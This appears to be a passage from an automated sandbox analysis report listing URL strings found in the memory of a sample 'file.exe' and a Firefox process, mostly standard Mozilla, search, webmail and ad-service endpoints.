Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001E.00000002.3060815323.00000270DADB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3067558634.00000270DB024000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DADD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113713962.00001252B7304000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001E.00000002.3097214328.00000270E2132000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001E.00000002.3031269537.00000270C9B6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E2173000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D61AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D61AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 0000001E.00000003.3009281847.00000270E40E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001E.00000003.3009281847.00000270E40E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001E.00000003.3009281847.00000270E40E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001E.00000003.3009281847.00000270E40E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965350403.00000270DA400000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965635133.00000270DA61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965901975.00000270DA636000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966671923.00000270DA683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001E.00000002.3100681543.00000270E233A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 0000001E.00000003.3011652184.00000270E2344000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3033402856.00000270D62FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D61AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D61AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 0000001E.00000003.2998160641.00000270E41EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E2103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001E.00000002.3031269537.00000270C9B0D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031269537.00000270C9B30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2983687435.00000270E4423000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2983687435.00000270E4423000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113713962.00001252B7304000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001E.00000002.3073075739.00000270DB85A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114598645.00002E21BBD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965901975.00000270DA636000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3071808582.00000270DB73B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966671923.00000270DA683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114285473.000020CCD0A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3100479236.00000270E2312000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 0000001E.00000002.3030250199.000001124EA00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?Z
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3042238317.00000270D7C73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2974249356.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043752217.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s_injectDefaultProtocolHandlersIfNeededresource://gre/modu
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3042238317.00000270D7C73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%shttps://outlook.live.com/default.aspx?rru=compose&
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 0000001E.00000003.2965901975.00000270DA636000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/setBlockedSponsorsMetrics
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/setBlockedSponsorsMetricsFORCE_PRIVATE_BROWSING_WINDOW
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/shims/adsafeprotected-ima.js
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/shims/adsafeprotected-ima.jsWeb
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001E.00000002.3069796496.00000270DB203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001E.00000002.3069796496.00000270DB203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001E.00000002.3108461657.00000270E4380000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E2166000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_ke
Source: firefox.exe, 0000001E.00000003.2998160641.00000270E41EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E4092000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3078302717.00000270DC74B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user_downloadDocument/
Source: firefox.exe, 0000001E.00000002.3067558634.00000270DB024000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001E.00000002.3060815323.00000270DADB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3067558634.00000270DB024000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DADD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001E.00000002.3047918500.00000270D8B4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.3388160352.0000027742E52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001E.00000003.3016349963.00000270DCBE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2994507601.00000270DCBE5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E2173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpInternalTestingProfi
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3089496928.00000270DDC8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingschrome://browser/content/mi
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesPanelUI._onNotificationButt
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
